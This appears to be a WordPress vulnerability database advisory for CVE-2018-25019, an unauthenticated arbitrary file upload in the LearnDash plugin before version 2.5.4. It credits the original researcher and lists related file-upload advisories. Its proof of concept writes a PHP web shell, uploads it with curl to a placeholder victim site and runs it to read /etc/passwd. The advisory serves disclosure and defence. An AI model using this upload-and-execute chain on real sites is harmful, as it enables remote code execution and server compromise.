LearnDash < 2.5.4 – Unauthenticated Arbitrary File Upload | CVE 2018-25019 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation and validation of the file to be uploaded in the learndash_assignment_process_init() function, which could allow unauthenticated users to upload arbitrary files to the web server

Proof of Concept

$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php

$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F 
"uploadfiles[]=@...hell.php.php" https://victim.tld/

$ curl 'https://victim.tld/wp-content/uploads/assignments/shell.php.'
-rw-r--r-- 1 root root 2385 Apr 14  2017 /etc/passwd

Affects Plugins

Fixed in 2.5.4

References

CVE

URL

https://lists.openwall.net/full-disclosure/2018/01/10/17

Miscellaneous

Original Researcher

Jerome Bruandet (NinTechNet)

Verified

Yes

WPVDB ID

9444f67b-8e3d-4cf0-b319-ed25e7db383a

Timeline

Publicly Published

2018-01-06 (about 7 years ago)

Added

2021-10-20 (about 4 years ago)

Last Updated

2022-04-14 (about 3 years ago)

Other

Published

Title

Published

2018-10-15

Title

Tajer - Unauthenticated Arbitrary File Upload

Published

2024-09-09

Title

Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress < 6.5.6 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2014-08-01

Title

Zarzadzanie Kontem - ajaxfilemanager.php File Upload Arbitrary Code Execution

Published

2022-03-14

Title

Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion

Published

2014-08-01

Title

The Cotton - Remote File Upload